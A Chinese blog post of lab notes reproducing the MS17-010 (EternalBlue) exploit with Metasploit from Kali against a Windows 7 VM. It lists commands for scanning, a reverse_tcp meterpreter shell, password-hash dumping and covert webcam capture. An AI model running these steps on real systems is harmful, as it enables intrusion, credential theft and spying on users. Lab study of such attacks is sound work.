0
点赞
收藏
分享

微信扫一扫

网络安全笔记DAY01

舟海君 2023-10-14 阅读 45

实战:MS17-010(永恒之蓝)漏洞测试实战

背景:2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。 恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制等恶意程序。


使用软件:Vmware Workstation 17

使用机:Kali

靶机环境:Win7

复现步骤:

步骤1:查看受害者的机器是否存活 nmap (同一网段IP地址)(1/24)可加可不加 (使用机与靶机注要保持同一网段 使用NAT,看相互是否ping通)    

全面扫描 nmap -T4 -A -v -Pn (IP地址) 1/24    

网络安全笔记DAY01_IP

步骤2:启动msf(metasploit) 命令为msfconsole  

网络安全笔记DAY01_Windows_02


步骤3 搜索漏洞 命令为:search ms17-010          

查看必备参数是否填写完。  

看到 RHOSTS(目标)空缺   设置目标并且看是否有MS17-010目标 

网络安全笔记DAY01_NAT_03


网络安全笔记DAY01_NAT_04


步骤4 使用序号为1的模块

命令:use 0    

网络安全笔记DAY01_Windows_05


看到 RHOSTS(目标)空缺

网络安全笔记DAY01_Windows_06


步骤5  查看设置负载  

因为 看到提示 no payload 所以要设置负载

查看  设置负载

命令:set payload windows/x64/meterpreter/reverse_tcp    

网络安全笔记DAY01_NAT_07

网络安全笔记DAY01_Windows_08

步骤6 设置靶机IP

命令:set rhost  

步骤7 设置使用机IP

命令:set lhost      

网络安全笔记DAY01_Windows_09

输入run 结果会显示WIN,表示拿到权限  

网络安全笔记DAY01_IP_10

发现会存在一定乱码,是编码的问题    

网络安全笔记DAY01_NAT_11

使用命令chcp 65001 补充: 936 =GBK(显示中文用的) 437=MS-DOS的默认字符集 65001=UTF-8

网络安全笔记DAY01_Windows_12

步骤8 屏幕快照     上传到C盘    

网络安全笔记DAY01_IP_13


网络安全笔记DAY01_Windows_14

看到快照了    从目标机中下载文件    

网络安全笔记DAY01_NAT_15

其他部分:

查看拿到的权限,为管理员

命令 getuid—— 

网络安全笔记DAY01_Windows_16

hashdump获取密码md5码      

网络安全笔记DAY01_NAT_17

网络安全笔记DAY01_Windows_18

其他命令:

webcam_list ——查看摄像头

webcam_snap——通过摄像头拍照

webcam_stream——通过摄像头开启视频

注:本文内容仅为学习分享,谨记网络安全法规,维护国家网络安全。



举报

相关推荐

0 条评论